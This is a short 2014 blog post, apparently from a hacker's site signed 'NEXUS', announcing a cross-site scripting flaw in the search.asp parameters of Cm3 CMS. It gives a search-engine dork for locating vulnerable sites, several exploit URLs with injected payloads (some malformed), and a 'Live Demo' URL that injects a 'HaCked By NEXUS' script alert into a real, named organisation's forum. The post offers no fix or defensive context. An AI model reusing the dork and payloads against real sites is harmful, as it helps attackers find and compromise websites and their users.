Home Unlabelled Cm3 CMS Cross Site Scripting (XSS)

Cm3 CMS Cross Site Scripting (XSS)

By
Tuesday, July 01, 2014
Read
Add Comment
Dork:
intext:"Powered by cm3"
* Keywords & strSearchPhrase Parametrs In Search.asp Are Vulnerable to XSS..

Exploits:
http://www.NEXUS.com/forums/search.asp?strSearchPhrase=">&ContainerID=&forumsearchoption=topics
http://www.NEXUS,com/search.asp?keywords=">&SearchType=And&;CurrentPage=1
http://www.NEXUS.com/search.asp?CurrentPage=1&sitekeywords">&;SearchType=Default 
http://www.NEXUS.com/search.asp?SearchType=Keywords&Keywords=">&x=0&y=0 
Live Demo:
http://www.ergonomics.org.au/forums/search.asp?strSearchPhrase=%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29;%3C/script%3E&ContainerID=&forumsearchoption=topics 

NEXUS 
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us